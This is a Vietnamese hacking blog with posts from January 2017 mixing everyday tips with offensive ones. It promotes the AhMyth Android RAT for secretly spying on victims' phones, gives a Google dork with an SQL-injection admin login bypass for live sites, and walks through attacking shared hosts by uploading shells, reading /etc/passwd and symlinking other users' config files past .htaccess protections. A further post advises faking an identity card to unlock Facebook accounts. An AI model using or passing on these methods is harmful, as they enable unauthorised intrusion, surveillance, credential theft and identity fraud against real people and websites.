Tuesday, January 31, 2017

Nâng cấp Windows 10 miễn phí bằng công cụ hỗ trợ cho người khuyết tật

Nâng cấp Windows 10 miễn phí bằng công cụ hỗ trợ cho người khuyết tật


Windows 10 đã không còn cho nâng cấp miễn phí kể từ cuối tháng 7 năm ngoái nhưng nếu bạn muốn "bắt chuyến đò cuối" thì Microsoft vẫn có giải pháp. Thông qua chương trình cập nhật Windows 10 dành cho người dùng sử dụng các công nghệ hỗ trợ (thường là người khuyết tật), bạn có thể cập nhật Windows 10 cho chiếc máy tính của mình miễn là máy đang sử dụng Windows 7/8/8.1 bản quyền.

Cách làm như sau


Trên máy tính cần nâng cấp, bạn mở trình duyệt vào địa chỉ:

https://www.microsoft.com/en-us/accessibility/windows10upgrade
Cập nhật Windows 10.jpg

Nhấn vào nút Upgrade Now để tải về file hỗ trợ nâng cấp có tên Windows10Upgrade24074.exe > nhấp đôi vào để mở cửa sổ nâng cấp (giống cửa sổ Get Windows 10 hồi xưa).
Công cụ sẽ tự động kiểm tra yêu cầu cập nhật như cấu hình máy, bộ nhớ trống ...
Cài đặt Windows 10.jpg

Khi đã thỏa mãn các điều kiện, công cụ sẽ tự động tải về bộ cài Windows 10 và tự động cài đặt. Mặc dù phương pháp này được Microsoft nói là dành cho những người gặp khó khăn khi sử dụng Windows và cần dùng đến các công cụ trong phần Ease of Access như Screen Reader (đọc các mục, nội dung trên màn hình), Magnifier (phóng to nội dung) vốn dành cho người khiếm thị nhưng khi cài đặt thì công cụ này không kiểm tra thêm, chỉ đơn giản là nhấp vào là chạy nên bạn có thể yên tâm nâng cấp.
Windows 8.1 Single Language.jpgBái bai Windows 8.1 Single Language ...

Mình đã nâng cấp thành công cho chiếc máy Dell Inspiron 7447 chạy Windows 8.1 Single Language của mama lên Windows 10 Home Single Language mà không gặp bất cứ trở ngại nào. Trải nghiệm sử dụng sau đó cũng không khác gì những bản Windows 10 Home khác.
Windows 10 Home Single Language.jpgXài Windows 10 Home Single Language sướng hơn. :)

Trên trang hỗ trợ cập nhật Windows 10, Microsoft cho biết hãng chưa công bố thời điểm chất dứt chương trình cập nhật miễn phí nói trên. Khi nào hết sẽ báo, như vậy trước mắt chúng ta cứ thoải mái cập nhật Windows 10 mà không phải lo lắng gì.

Nguồn: Internet US


AnonyViet Chúc các bạn năm mới nhiều sức khỏe và thành công trong công việc

Friday, January 27, 2017

AhMyth - Rat cho Android 2017

AhMyth - Rat cho Android 2017


Chào các bạn quà chúc mừng năm mới 2017,
Một con RAT mới và nó không phải dành cho máy tính mà chính là dành riêng cho hệ điều hành Android và sử dụng để xâm nhập điện thoại một cách âm thầm và trái phép.

AnonyViet đã đăng nhiều RAT và đa số chúng ta dùng chúng để xâm nhập máy tính thì phải ! Nhưng hôm nay, con RAT này là dành cho Android nhe các bạn :D

[su_spoiler title="Chức năng nổi bật của AhMyth RAT" icon="chevron"]
- Xâm nhập âm thầm vào hệ điều hành Android
- Hỗ trợ gắn kèm vào một file .apk khác để người khác không nghi ngờ.
- Gửi tin nhắn và tính tiền bằng tiền điện thoại Victim, có thể xem trộm tin nhắn.
- Dễ dàng Upload hoặc Download file trong bộ nhớ điện thoại và thẻ nhớ
- Xác định Ip và định vị Victim.
- Một vài chức năng thú vị khác các bạn tự tìm hiểu nhé !![/su_spoiler]

Một Vài hình Ảnh Của AhMyth:





Cách sử dụng:


  • Cũng như các con RAT khác, Các bạn phải mở Port ( >1024) cho modem.

  • Tạo Host ảo ( Bằng No-IP). Đăng kí host tại No-Ip và tải DUC trên noip về là được.

  • Vậy là build được rồi, có thể gắn kèm vào file apk khác để victim không nghi ngờ.

Link Download Google Drive (Win 64bit)


(Ấn Vào Hình)



AnonyViet Chúc Các Bạn Thành Công ! Hãy Like Fanpage để cập nhật thường xuyên nhé 

Sunday, January 22, 2017

Hướng dẫn Hack Website sử dụng Diazcreativos Cms

Hướng dẫn Hack Website sử dụng Diazcreativos Cms


Bài viết dành cho các bạn nào đam mê công nghệ tích lũy thêm kiến thức để nghiêng cứu hay học tập dì đó !!

Đầu tiên, công cụ chủ chốt của chúng ta vẫn là thuật toán tìm kiếm vi diệu "Google".
Các bạn vào Google và nhập vào ô tìm kiếm:
[su_highlight]Google Dork : intext:www.diazcreativos.net.ve[/su_highlight]



Trong số các kết quả tìm kiếm, Chọn một trang bất kì mà các bạn muốn...

Và điền vào phía sau liên kết của trang đó [su_highlight]/admin[/su_highlight]

Vd mình chọn trang: https://cxsecurity.com/


Sao khi vào giao diện đăng nhập các bạn đăng nhập bằng user và mật khẩu bên dưới

Đăng nhập
(Copy và paste qua cho chính xác)
| Username :[su_highlight] '=' 'or' [/su_highlight]
| Password :[su_highlight] '=' 'or'[/su_highlight]




Vậy là vào được giao diện điều khiển website với tư cách một Admin. Đây cũng là một kiến thức bảo mật mạng và là lỗ hổng của đa số các trang web bảo mật yếu nhé !!

AnonyViet chúc các bạn thành công 
Happy New Year 2017

Saturday, January 21, 2017

Hướng dẫn tạo ảnh Facebook trong suốt cằm trên tay với Picsart

Dạo này trên Facebook rộ lên phong trào mới đó là, một bàn tay cằm cái thẻ ảnh Profile Facebook trong suốt trong rất ngầu, hôm nay mình sẽ hướng dẫn các bạn tự làm riêng cho mình 1 bức ảnh mà không cần biết gì về Photoshop nhé

Bước 1: Bạn phải sử dụng SmartPhone và tải App Picsart theo đường dẫn sau:

Bước 2: Bạn vào FB tường nhà bạn rồi chụp hình lại + Chụp 1 tấm có bàn tay đang nắm của bạn, hoặc Save tấm hình ở dưới về điện thoại cũng được

Nên chụp với phông nền đơn giản, ví dụ như hình ở bên dưới.
tạo ảnh Facebook trong suốt bằng Picsart

Bước 3: Mở App Picsart vừa tải ở Bước 1 lên, chọn Chỉnh sửa và add ảnh nền vào.
tạo ảnh Facebook trong suốt bằng Picsart

Bạn sẽ được chuyển đến giao diện chỉnh sửa hình như sau. Kéo thanh công cụ sang trái, chọn mục Thêm ảnh.
tạo ảnh Facebook trong suốt bằng Picsart

Bước 4: Chọn tính năng Hòa trộn > Nhiều lớp.

Bạn có thể di chuyển, thu phóng hay xoay bức ảnh tùy theo ý thích bằng cách kéo các ô vuông ở 4 cạnh, muốn xoay hình thì giữ nút mũi tên cong ở góc trên bên phải
tạo ảnh facebook trong suốt bằng Picsart

Picsart còn cho phép chúng ta tạo ra bước ảnh 3D như hình bên dưới
tạo ảnh facebook trong suốt bằng picsart

Cách tạo ảnh 3D: Cụ thể là bạn cần tạo một nền trắng, rồi tùy chỉnh bằng cách chọn Công cụ > Hình phối cảnh.
tạo ảnh Facebook trong suốt bằng Picsart

Sau đó tùy chỉnh theo chiều dọc hoặc chiều ngang.
tạo ảnh Facebook trong suốt bằng Picsart

Sau đó ghép ảnh như hướng dẫn ở đầu bài là xong.

Theo: Thegioididong

Friday, January 20, 2017

Hướng dẫn nhận thẻ Master Card miễn phí và 200.000đ

Hiện nay ngân hàng VIB đang chạy chỉ tiêu thẻ tín dụng nên đang ra Even rất lớn, đó là mở thẻ tín dụng miễn phí (Master Card) và nhận 200.000đ, không có gì HOT hơn sự kiện lần này cả. Hôm nay mình sẽ hướng dẫn các bạn cụ thể cách nhận thẻ Hướng dẫn nhận thẻ Master Card miễn phí và 200.000đ này

[su_box title="Chú Ý" style="glass" box_color="#bc3b27" radius="1"]Các bạn đọc kỹ từng bước nha, cầm đèn chạy trước ô tô, lố qua bước khác là Back lại không được đó[/su_box]


Bước 1: Nhấp vào Link đăng ký dưới đây, để bắt đầu mở thẻ miễn phí


[su_button url="https://vib.com.vn/wps/portal/newrequest/getting-started?refid=0933162862" target="blank" style="stroked" size="7" center="yes" radius="round" text_shadow="px px px "]Đăng ký MasterCard và 200k[/su_button]



Bước 2: Điền đầy đủ và chính xác thông tin


Bạn phải điền đúng:
  • Họ và Tên: để đúng thông tin in trên mặt thẻ nhé

  • Địa chỉ email: Sẽ có email xác nhận về

  • Số điện thoại: Nhận mã OTP



Bước 3: Làm theo hướng dẫn dưới đây


Bước này bạn phải đọc kỹ nhéu

Mục Thông tin cá nhân: điền theo đúng Chứng minh nhân dân hoặc thẻ căn cước


Mục Đăng ký mở thẻ thanh toán: check vào Visa Classic

Kiểm tra lại Họ tên in trên thẻ đúng chưa


Nhập tên đăng nhập (Username) để quản lý tài khoản của mình




Bước 4: Xác thực thông tin


Nếu bạn ở TP.HCM hay Hà Nội thì nên Check vào Nhân viên chuyên trách của VIB phục vụ tận nơi, khi đó bạn chọn thời gian và địa điểm sẽ có người đến tận nhà bạn hoặc cơ quan để xác nhận thông tin cho bạn.


Nếu bạn ở tỉnh khác thì chọn Xác thực thông tin tại ngân hàng, khi đó chỉ cần đem CMND ra ngân hàng VIB ở gần chỗ mình ở nhất để xác nhận rồi nhận thẻ tại đó luôn





Bước 5: Xác nhận và nhập Code để nhận Master Card và 200.000VNĐ


Bước này bạn kiểm tra thông tin lại một lần nửa cho chắc chắn

Ở mục nhập Code nhận 100k, thì bạn nhập CODE 0933162862 thì mới nhận được Master Card và 200k nha, nếu không nhập hoặc nhập sai, thì ngân hàng sẽ từ chối




Bước 6: Xác nhận OTP


Khi này sẽ có 1 mã OTP gửi qua tin nhắn điện thoại cho bạn, chỉ gần nhập 6 chữ số trong tin nhắn, là bạn đã hoàn tất.

 


Giờ chỉ việc run đùi ngồi chờ mấy em xinh tươi đến xác nhận CMND hoặc nhanh chân chạy ra ngân hàng VIB gần nhất, đưa CMND cho mấy e xinh đẹp ở đó rồi lấy thẻ về + 200k có sẵn trong thẻ thôi


Mọi chi tiết đăng ký nhận thẻ Master Card miễn phí và 200.000đ sẽ gửi về Email cho bạn



Ưu đãi Event lần này


Từ 06/12/2016 – 28/02/2017, khi mở thẻ tín dụng VIB thông qua hình thức trực tuyến, bạn sẽ nhận ngay vali sành điệu, túi xách du lịch từ chương trình khuyến mãi . Cụ thể:




















Quà tặng



Số lượng



Dòng thẻ áp dụng



Điều kiện nhận quà



Thẻ nạp điện thoại 200.000 VND



200


VIB Platinum

VIB Gold

VIB Classic
200 Chủ thẻ chính đầu tiên được phát hành thẻ tín dụng khi điền đầy đủ thông tin đăng ký mở mới thẻ qua website www.vib.com.vn trong thời gian khuyến mãi

Vali



150


VIB Platinum150 Chủ thẻ chính đăng ký mở thẻ tín dụng Platinum qua website www.vib.com.vn trong thời gian khuyến mãi; có tổng giá trị giao dịch hợp lệ đạt mức tối thiểu 3 triệu đồng sớm nhất trong vòng 30 ngày kể từ ngày phát hành thẻ nhưng không chậm hơn ngày 31/03/2017

Túi xách



1050


VIB Gold VIB Classic1050 Chủ thẻ chính đăng ký mở thẻ tín dụng Gold hoặc Classic qua website www.vib.com.vn trong thời gian khuyến mãi; có tổng giá trị giao dịch hợp lệ đạt mức tối thiểu 1.5 triệu đồng sớm nhất trong vòng 30 ngày kể từ ngày phát hành thẻ nhưng không chậm hơn ngày 31/03/2017

Có thắc mắc gì cứ comment ở dưới, mình sẽ giải đáp tất cả cho các bạn

Tuesday, January 17, 2017

Share công thức kiếm tiền thụ động với Spark Profit

Hôm nay AnonyViet sẽ Share công thức kiếm tiền thụ động với Spark Profit, thụ động ở đây có nghĩa là không làm gì mà tiền vẫn về nhé, mọi phải scam hay lừa đảo gì đâu, chỉ cần có đầu óc phân tích và tính toán 1 xíu là OK thôi, trong vòng vài phút mà Ad có 90.000 point rồi đấy

Spark Profit là gì


Đây là một trang Web tạo ra sân chơi dựa trên dự đoán về giá Dầu thô, giá vàng, hoặc ngoại tệ sẽ tăng hay giảm trong 1 khoảng thời gian, mình sẽ nhìn vào biểu đồ mà dự đoán thời gian tiếp theo giá sẽ như thế nào, nếu dự đoán đúng thì bạn sẽ được cộng tiền vào tài khoản, gôm được 30$ rồi rút ra nhé. Hãy mời thêm bạn chơi để cả 2 cùng có $ về nhanh hơn nhé


Hướng dẫn đăng ký Spark Profit


Bước 1: Click vào link dưới đăng để đăng ký (Link Ref nhé)

[su_button url="https://goo.gl/iMM65s" target="blank" style="stroked" size="7" center="yes" radius="round" text_shadow="px px px "]Đăng ký Spark Profit[/su_button]



Bước 2: Click vào nút Join


Bước 3: Nhập thông tin cho chính xác để xác nhận Email nhé




Hướng dẫn kiếm tiền Spark Profit


Bước 1: Sau này khi đăng ký xong, bạn nhìn ở góc phía dưới bên phải có chữ Option, click vào đó, bổ sung thông tin cho đầy đủ, xác nhận Email luôn nhé

Nhớ nhập Số điện thoại vào và xác minh luôn nha (hên thì nó sẽ nhắn tin, ko thì bạn phải đợi tầm 3000s thì bạn nhấn Call me để nó gọi đọc code cho bạn nhập vào.


Bước 2: Nhìn ở góc trái bên dưới nhấn vào lá Cờ để bắt đầu tham gia dự đoán



Bước 3: Ban đầu bạn trong giao diện bạn nhỉ thấy có 1 Ô được mở thôi đúng không, hãy nhấn vào dấu + như trong hình, hiện hiện ra cái bảng cứ click nhiệt tình vào, bạn sẽ mở được thêm vài ô nửa


Click vào Slide liên tục để tắt cái bảng này, ô sẽ được mở




Hướng dẫn dự đoán Spark Profit


Trong hình ở trên là mình mở được 5 ô rồi nhé, giờ mình sẽ hướng dẫn bạn dự đoán, đọc kỷ hướng dẫn nhé, đừng cằm đèn chạy trước ô tô  8-)


Bước 1: Click vào dự đoán giá vàng trước nhé, các thể loại khác cứ làm tương tự


Click vào biểu tượng Vàng, để bắt đầu tự đoán


Bước 2: Bạn sẽ thấy biểu đồ xuất hiện của giá vàng theo thời gian, kệ mẹ nó đi, click tiếp vào cái ô ở bên phải có Click here to Play (năm dọc)



Bước 3: Bạn sẽ thấy xuất hiện mũi tên lớn ở trang tiếp theo, bây giờ bạn dự đoán là giá Vàng sẽ tăng hay giảm thì kéo mũi tên theo hướng lên (giá Vàng tăng), hướng xuống (giá Vàng giảm)


Dùng chuột giữ mũi tên, rồi kéo lên hướng trên nhé, xem hình bên dưới



Dự đoán xong, sẽ có thời gian nó chạy ở phía sẽ, bạn cứ kệ mẹ nó đi, nhấn nút mũi tên ra lại  rồi đoán tiếp giá Dầu


Xem Video Demo nhé


[video width="1366" height="638" mp4="https://anonyviet.com/wp-content/uploads/2017/01/2017-01-17_19-00-43.mp4"][/video]

Đây là kết quả của mình dự đoán:



  • Số màu xanh là điểm bạn thắng do dự đoán đúng

  • số màu đỏ là điểm thua bị trư do đoán sai

Dự đoán xong thì cứ thoát trình duyệt hoặc app ra, vài tiếng sau quay lại để xem kết quả



Công thức dự đoán giá ngoại tệ


Hoặc là bạn xem diễn biến giá Vàng, Dầu, ngoại tệ trên các Website tài chính

Hoặc mình thường làm theo mẹo này, thường giá Vàng với giá $ sẽ đối nghịch nhau, Vàng lên thì $ giảm hoặc ngược lại, khi bạn kéo vàng lên cao kịch kim thì qua $ kéo xuống dưới kịch kim

CÁCH TÍNH TIỀN


Cứ mỗi tuần nó lại phát ra một lượng tiền, hiện tại mỗi tuần nó phát ra là 3200$ cho tất cả người chơi, lưu ý là người chơi nào trên 20000 điểm mới được thưởng $ nha (trên 20000 dễ lắm-sẽ có hướng dẫn). Do đó ai được nhiều điểm sẽ được nhiều tiền và ngược lại! Các bạn có thể xem thứ hạng của mình và số tiền dự kiến mình nhận được khi hết tuần ở tap social r bấm vào hình cái cúp ở góc trên bên trái! Tiền sẽ được cộng dồn theo từng tuần đến khi bạn đủ 30$ bạn sẽ rút được! Trong tab Me sẽ có thông báo khi bạn đủ, nó pay tầm 5-7 ngày (theo thông tin từ người bạn chơi trước)


Một lưu ý nhỏ: Các bạn cứ đặt thoải mái nha nó không trừ tiền mình đâu, nếu âm nhiều hơn số điểm đang có thì khi stop điểm các bạn chỉ bị trừ về 0 thôi chứ điểm không bao h âm nha! Nên nếu bị âm quá r thì stop đặt lại cho nhanh, đó là cách chơi của mình!

Chơi trên điện thoại: Nếu dùng ios các bạn vào appstore tìm "Sparkprofit" cài vào r đăng nhập! Android thì vào Ch Play! Nhưng để ý phần đăng ký các bạn chưa đặt được mật khẩu nha, nên khi đăng nhập trên điện thoại các bạn chọn forgot password r vào mail để lấy pass đặt lại nha!
PROOF: Mượn của người bạn.

Hướng Dẫn Đổi Tên Facebook ký tự đặc biệt 2017

Hôm nay mình sẽ chia sẻ với các bạn TUT tạo tên Facebook ký tự năm 2017 cực mới và lạ nha. Đảm bảo 100% thành công !



 


Chuẩn Bị: 1 Account FB Còn Lượt Đổi Tên 1 Addon Fake IP ( Hola )


Vào FB đổi ngôn ngữ sang Español



Chuyển IP bằng Hola hoặc phần mềm Fake IP khác của bạn qua Braxin. Ở đây mình dùng Hola nên mình sẽ chọn như thế này :



Các bạn vào  Đổi tên


Tại mục Nombre các bạn nhập: Ձ.Օ .


Mục Segundo nombre các bạn bỏ trống


Mục Apellido các bạn nhập : ւ.Դ



Chọn "Revisar Nombres" để lưu lại
Chúc các bạn thành công !
Nguồn: Internet

Monday, January 16, 2017

Unlock Facebook Bị Checkpoint 13T,14T

Tut Unlock Facebook Bị Checkpoint 13T,14T


Bước 1: Các bạn Fake IP Tây Ban Nha Hoặc Nhật Bản

Fake 1 Chứng Minh Thư Chuẩn tí nhá( Ngày sinh Đúng trong nick, Tên thật của mình)


Bước 2: Sau đây 3 Link Unlock 2 loại Checkpoint đây




  • Nick các Bạn Die Checkpoint Tên giả thì Dùng link: 237-593

  • Còn Nick Bạn Die CP 13-14Tuổi thì: 593-767 Nhá

  • Canh 3-4Giờ Chiều, 8-9Giờ tối Mà Unlock Nhá


Bước 3: Các bạn lưu case lại, Chờ facebook rep

Về thì thôi, còn rep tạch thì các bạn Kháng câu này+Úp CMND Lại:

My name: Tên của bạn

Date of Birth: Sinh nhật của bạn

Contact Email: Email của bạn

My account has been locked in error again. I will provide a government-issued ID for you to check. Please check the ID and unlock the account. Thanks for support



[box title="Lưu ý" border_width="1" border_color="#4237bf" border_style="solid" align="center"]Chỉ rep 2 lần, Nếu 3 lần rep thì sẽ tự đóng case, lúc đó bạn phải đợi 7ngày mới được Unlock lại[/box]

Nguồn: tùm lum trên Internet

Tư duy về phương pháp Hack Website

Tư duy về phương pháp Hack Website


Tình hình là có khá nhiều bạn Inbox mình hỏi cách check site. Mà Mình cũng không có nhiều thời gian để chỉ từng bạn. Nên mình viết cái đường hướng tư duy check site để các bạn đọc. Từ đó có một cái định hướng => Tự mình nghiên cứu => Thực hiện.

- Điều đầu tiên mình muốn nói đó là muốn tấn công 1 site. Điều đầu tiên bạn cần có đấy là sự kiên nhẫn. Cóp nhặt từng tí một. Không thể nôn nóng mà bỏ qua nhiều thông tin. Dẫn đến giảm hiệu quả. Không phải website nào tấn công 1 phát cũng là được ngay.Chính vì thế nên phải tích từng đi thông tin một.

Nếu để kiếm một site để check chơi thì tốt nhất là các bạn nên dùng các dork tìm các site có lỗi sẵn.
Ví dụ như các dork sqli, Các dork của các phiên bản joomla ,vbulletin có lỗi. Như vậy sẽ hiệu quả hơn là tìm 1 site bất kì rồi xem thử nó có lỗi không. (Ngoài ra còn có một cách nhanh hơn nữa đó là dùng tool scan dork. Nó sẽ tìm cho bạn một khối site bị lỗi có thể check được từ một list dork có sẵn.Cái này hiệu quả hơn cho dân UG lúc tìm shop lỗi).

Còn nếu bạn muốn tấn công một website xác định. Thì việc này khó hơn.
  • Giả sử victim của bạn có domain là target.com. Để tấn công victim một cách hiệu quả. (Mình nói ở đây là cả đối với host share và private.Site lớn có bảo mật tốt, lẫn site nhỏ hay forum).

Bước 1: Lấy thông tin ban đầu


Lấy thông tin của victim. Bằng các whois nó. Tìm hiểu càng nhiều thông tin về victim càng tốt. Và google ,bing ,yandex .... đều là các công cụ hữu ích. Mình khuyên nên thử với nhiều công cụ tìm kiếm. Vì bản thân thuật toán tìm kiếm của các công cụ này khác nhau nên dẫn đến cho nhiều kết quả với hiệu quả khác nhau.
Ví dụ như nhập vào công cụ search như sau
[su_quote]ip:123.101.11.122 id=[/su_quote]

Nó sẽ cho ta một số thông tin thú vị. Bạn hãy cố gắng thu thập thông tin ban đầu càng nhiều càng tốt. Chủ sở hữu domain. Admin của website. Support. Kể cả số điện thoại, Facebook, Gmail , Yahoo, địa chỉ Mail của công ty. Một Attacker giỏi là một attacker có khả năng tận dụng mọi sơ hở. Mọi điểm yếu có thể tấn công.

Bước 2 : Phân tích khả năng tấn công


Đầu tiên là nên scan victim chính. Scan victim chính là công việc chủ đạo. Đối với site nằm trong server private của các công ty lớn. Thì đây là bước đóng vai trò quyết định bạn có thể attack được nó hay không.
Công cụ scan khá nhiều.Mình giới thiệu bạn 1 số bộ như

Acunetix Vulnerablility Scanner . OpenVas (của backtrack ) , w3af ( của backtrack ) , nessus (của backtrack ), wpscan ( scan wordpress trong backtrack ) , joomlascan ( scan bug joomla trong backtrack , uniscan ( trong backtrack ) ... ngồi mà kể hết các bộ công cụ chắc đến sáng mai.

Công cụ thì nhiều nhưng các bạn nên chọn lựa. Đối với victim nào nên dùng bộ nào. Và nên dùng kết hợp. Vì như mình đã nói. Với mỗi tool khác nhau nó dùng cơ chế, thuật toán scan khác nhau. Nên hiệu quả nó cũng khác nhau. Từ kết quả scan được. Nó cho ta định hình phải tấn công như thế nào.

Scan server - Scan lấy thông tin về server. Ví dụ như xem server dùng hệ điều hành gì. Sử dụng Apache, SII phiên bản bao nhiêu. Được viết trên ASP hay PHP. Port nào mở (Để scan port thì có thể dùng nmap. Nó là công cụ rất hiệu quả).

Mọi thông tin về phiên bản, Port bạn hãy Google ngay. Hoặc vào exploit-db.com xem nó có thể bị attack thông qua nó hay không. Còn không bạn có thể lưu lại thông tin.Rồi sau đó kiểm tra 1 lần xem sao.Đây là các bước rất cần thiết đối với việc tấn công 1 website lớn.

Đối với Server share host. Phân tích khả năng tấn công. Đây cũng là một bước rất quan trọng. Nó rút ngắn thời gian tấn công của bạn.Nhưng mang lại hiệu quả cao.
Mình thấy đa số (Và trước đây mình cũng vậy ). Đó là để tấn công 1 website ko bị lỗi, Không có lỗ hổng. Mình thường reserve ip của server chứa victim. Rồi mở từng site check xem có sqli hay không.
Đồng ý là sqli rất nhiều. Và rất dễ khai thác. Nhưng không phải lúc nào mình cũng có thể may mắn. Check 1 cái là ra link bị lỗi ngay. Nếu scan toàn bộ site thì đến bao giờ mới xong. Có một cách rút ngắn quá trình này đó là xác định loại site cần tấn công.

Mình ví dụ. Bạn có kinh nghiệm về check wordpress. Bạn muốn tìm các site trong server sử dùng mã nguồn này để tấn công. Sau đó local sang victim chính. Hãy dùng google với dork là

ip:112.78.2.247 "wordpress"

Như đây mình nhận được một victim trong server này sử dụng wordpresss http://www.saigoncanho.com.vn/

Tương tự cho các mã nguồn khác cũng vậy.

Bước 3: Tấn công


Đây là bước nhiều nhất,Nhưng mình nói ít nhất,ví nó có quá nhiều kiểu tấn công. Biết nói thế nào cho hết được.
Chỉ đúc kết một số kinh nghiệm. Ví dụ như đối với forum vbb chẳng hạn. Nhiều phiên bản thực sự không có bug. Nhưng không phải vì thế mà ta bỏ qua. Hãy xem các web application của nó. Ví dụ như các mod. Đối với joomla và các mã nguồn khác cũng vậy. Hãy xem cách extension đi theo. Chúng rất hay bị lỗi.Bởi vì đây đa số là các ứng dụng tích hợp được viết bởi các web developer việt nam. Chúng rất kém trong việc bảo mật.

Tận dụng tối đa kết quả mà các bạn scan ở trên.
  • Ví dụ như bạn scan được server dùng apache 2.1 chẳng hạn. Hãy xem nó là bản update chưa. Nếu chưa có lỗi để khai thác không. Tấn công vào nó.Xem thông tin từ các lỗi public trên google mà tấn công.Hãy cố gắng tấn công 1 cách từ từ.


Xem trong cấu trúc site khi scan được. Chỗ nào là khai thác được.Ví dụ như chúng để lại database back up trên site chẳng hạn. Tải về và phân tích ngay.

Nhiều bộ công cụ scan nó scan đến từng lỗi nhỏ.Như tìm vị trí có thể up ảnh, up file bẳng hạn. Hãy cố bypass up shell thử xem.

Ở mục này có quá nhiều cái để nói. Và thực chất đa số mọi tut hack thường nói về phần này. Nên mình để phần này cho các bạn. Hãy cố gắng tích hợp càng nhiều kinh nghiệm phần này . Càng nhiều càng tốt. Các phần khác nó đi theo 1 qui luật nhất định. Có thể đối với victim nào bạn cũng làm như thế. Nhưng đối với phần này.Nó phụ thuộc vào nhiều thứ. Phụ thuộc vào kết quả scan được. Phụ thuộc vào những đối tượng khác nhau. Nên nó rất đa dạng.

Kết quả ở phần này. Là bạn có thể có được tài khoản admin.Up được shell.

Bước 4: Nếu tấn công được trực tiếp target rồi thì không nói làm gì.Nếu tấn công đc một site nằm cùng server.Thì bước tiếp theo là local.Về vấn đề local này cũng khá rộng.Mình chỉ nói qua một phần trong đó.


Trong local thì symlink là một kiểu local phổ biến nhất ,Được dùng nhiều nhất.Nó như là một shortcut bên window.Góp phần làm nhanh quá trình gọi chạy một file.Nếu như gọi trực tiếp hardlink thì quá trình họat động của server sẽ chậm hẳng.

Trong phương pháp local.Mục đích chính của chúng ta là đọc / lấy các file config (hoặc 1 file config của target cần tấn công ). Việc thực hiện đầu tiên là chúng ta thường đọc file /etc/passwd để xác định tất cả các user nằm trong server ( Và không phải server nào cũng cho ta thực hiện đc.Phải bypass ).

Để đọc file config ta còn phải nắm các mã nguồn.Với mỗi mã nguồn khác nhau thì file config nó nằm ở một vị trí khác nhau.
Mình đưa ra một số file config đối với một số mã nguồn tương ứng.
Vbulletin: public_html/includes/config.php
PHPBB: public_html/config.php
Joomla: public_html/configuration.php
WordPress: public_html/wp-config.php
ibp: public_html/conf_global.php
php-fusion: public_html/config.php
Smf: public_html/Settings.php
phpnuke: public_html/html/config.php
Xoops: public_html/mainfile.php
ZenCart: public_html/includes/configure.php
setidio: public_html/datas/config.php
Discuz: public_html/config/config_ucenter.php
Bo-Blog: public_html/data/config.php
Nukeviet: public_html/config.php
Drupal: public_html/sites/default/settings.php
Textpattern: public_html/textpattern/config.php
Serendipity: public_html/serendipity_config_local.inc.php
Pligg CMS: public_html/libs/dbconnect.php
Pivotx: public_html/pivotx/includes/minify/config.php

 

Từ đây ta hình dung được đường dẫn chính xác dẫn đến file config của victim. Từ đó có thể symlink được chính xác file cần đọc. (Nếu như victim đổi vị trí của file config. Thì ta phải ngồi symlink mò. Symlink từ index nó,đến những file khác,xem nó include những file nào. Từ file này dò đến file kia. Đối với một attacker kinh nghiệm. Thì việc bảo mật bằng cách giấu file config của victim đôi khi không hiệu quả.

Cấu trúc lệnh symlink (để symlink file có địa chỉ là /home/usertarget/public_html/includes/config.php target.txt
lệnh này symlink file config về file target.txt nằm ở thư mục ta đang symlink. Ở điều kiện tốt nhất ta có thể đọc đc file target.txt này trên host ta đặt shell.

Nhưng không phải khi nào ta cũng có điều kiện tốt như vậy. Chủ của website có thể chmod không cho ta đọc file config (100,101,400... ) chẳng han. Tùy server.Hoặc chủ website đặt tại thư mục chứa file config đấy 1 file .htaccess có nội dung như sau.
[su_quote]
<Files config.php>
order allow, deny
deny from all
</Files>[/su_quote]

Nếu chủ site đặc như thế thì khi symlink ta sẽ nhận được thông báo là 403 Forbidden Error.
Ở bài này mình chỉ nói đến tư tưởng tấn công chứ không nói chi tiết về phương pháp tấn công. Nên mình chỉ nêu 1 vài ví dụ.

Nếu như ta không đọc được thì sao. Ta phải suy nghĩ vì sao không đọc được. Tư duy đặt trường hợp ta vào vị trí admin của victim. Nếu là ta ,ta sẽ bảo mật như thế nào.Sẽ làm gì.Từ đó ta có những biện pháp khác nhau.

Giả sử như ta tìm giải pháp để bypass 403 forbidden error do chủ website đặt file .htaccess chẳng hạn nhé.
Trên host ta đặt shell. Tạo một thư mực có tên là VHBSYSTEM chẳng hạn. Đường dẫn đầy đủ của nó ví dụ như sau : /home/attacker/public_html/VHBSYSTEM/ .Chmod lại thư mục này là 777 (lúc đầu chưa cần.Nếu không được hẵn thử ). Sau đó tạo một file .htaccess với nội dung như sau
[su_quote]HeaderName vhb.txt[/su_quote]

Đặt file .htaccess này vào thư mục /home/attacker/public_html/. Nếu ta symlink file config vào file vhb.txt với cấu trúc lệnh ln -s /home/victim/public_html/includes/config.php vhb.txt

Thì sau khi symlink xong. Ta vào thư mục VHBSYSTEM và đọc file vhb.txt vừa symlink về. Nó sẽ bypass được.

Đây chỉ là 1 ví dụ trong nhiều cách bypass. Nhiều bạn bảo local phải có tư duy. Nhưng mình nghĩ muốn local tốt thì phải biết nhiều cách bypass trong trường hợp không đọc được file.

Vấn đề này bạn nên tham khảo thêm ở nhiều tài liệu được share trong VHB. ( hoặc ghé thăm vhbgr0up.blogspot.com )

Trong các cách cũng được khá nhiều người dung.Nhưng dùng symlink all config ( cái này trên blog và forum của vhb cũng có nói rồi ). Sym root bằng cách tạo sym root ở một server linux nào đó .Sau đó tar lại.Up lên server cần local.Cái này trên VHB cũng nhiều bài nói đến rồi.

Mình đề cập thêm việc sym root ngay trực tiếp trên server. Đôi khi nó khá hiệu quả trong việc bypass security.
Như khi nãy. Tạo một folder VHB để tiện xử lí link full của nó /home/attacker/public_html/VHB. Sau đó ta thực hiện symlink trên shell như sau " ln -s /root". Sau đó ta chọn một victim có domain là target.com chẳng hạn. Tiếp tục type "ls -la /etc/valiases/target.com". Sau ddos quay lại folder ta vừa tạo VHB. Đặt vào đấy 1 file htaccess có nội dung như sau
[su_quote]Options Indexes FollowSymLinks
DirectoryIndex index.htm
AddType txt .php
AddHandler txt .php[/su_quote]

Bây giờ ta vào xem ta symlink được những gì. Nếu như chỗ nào nó báo permisssion access. Thì cũng đừng lo lắng bận tâm. Hãy vào sâu hơn.Giả sử ta cần xem target.com có user lấy được ở trên là target đi.
Thì ta xem nó với link sau attacker.com/VHB/root/home/target/public_html/ ......
Đôi khi xem không được thì có thể view source lên nhé.

Thôi dừng ở việc local lại. Không viết đến khi nào mới xong. Bạn cứ lượn trên blog VHB 1 tuần. Kiểu gì chả pro local :)

 

Bước 5.Rooting


